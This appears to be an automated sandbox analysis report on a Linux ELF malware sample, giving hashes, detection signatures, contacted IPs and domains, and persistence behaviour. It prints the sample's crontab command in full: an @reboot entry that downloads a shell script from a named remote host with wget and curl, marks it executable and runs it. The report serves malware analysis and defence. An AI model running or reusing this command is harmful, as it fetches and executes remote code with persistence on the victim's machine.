Linux Analysis Report
gmpsl.elf

Overview

General Information

Sample name: gmpsl.elf
Analysis ID: 1542855
MD5: 353a49ca2c9b8b35fb036b2de1587fc4
SHA1: e5cd1ab8dc2c224a5b82113a41ec46479895ae27
SHA256: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: gmpsl.elf ReversingLabs: Detection: 18%
Found strings indicative of a multi-platform dropper
Source: tmp.iGlZeG.19.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 195.133.92.51 ports 13529,1,2,3,5,9
Source: global traffic TCP traffic: 88.151.195.22 ports 16375,1,3,5,6,7
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:41720 -> 195.133.92.51:13529
Source: global traffic TCP traffic: 192.168.2.15:32896 -> 31.13.248.89:11885
Source: global traffic TCP traffic: 192.168.2.15:49956 -> 88.151.195.22:16375
Sample listens on a socket
Source: /tmp/gmpsl.elf (PID: 5556) Socket: 127.0.0.1:1172 Jump to behavior
Source: unknown UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown UDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.iGlZeG.19.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal60.troj.linELF@0/1@6/0

Persistence and Installation Behavior
barindex
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 5562) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 5561) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Sample tries to persist itself using cron
Source: /usr/bin/crontab (PID: 5561) File: /var/spool/cron/crontabs/tmp.iGlZeG Jump to behavior
Source: /usr/bin/crontab (PID: 5561) File: /var/spool/cron/crontabs/root Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5580/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5591/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5581/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5592/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5582/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5593/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5583/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5584/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5585/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5586/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5587/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5392/cmdline Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5590/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5588/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5578/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5589/status Jump to behavior
Source: /tmp/gmpsl.elf (PID: 5563) File opened: /proc/5579/status Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/gmpsl.elf (PID: 5558) Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: submitted sample Stderr: no crontab for root: exit code = 0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/gmpsl.elf (PID: 5556) Queries kernel information via 'uname': Jump to behavior
Source: gmpsl.elf, 5556.1.000055ada9cc4000.000055ada9d8e000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: gmpsl.elf, 5556.1.00007fff63f80000.00007fff63fa1000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/gmpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/gmpsl.elf
Source: gmpsl.elf, 5556.1.000055ada9cc4000.000055ada9d8e000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: gmpsl.elf, 5556.1.00007fff63f80000.00007fff63fa1000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
88.151.195.22
 unknown Azerbaijan
15723 AZERONLINEAZ true
195.133.92.51
 unknown Russian Federation
197695 AS-REGRU true
31.13.248.89
 unknown Bulgaria
34224 NETERRA-ASBG false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.35.25 true
kingstonwikkerink.dyn 193.233.193.45 true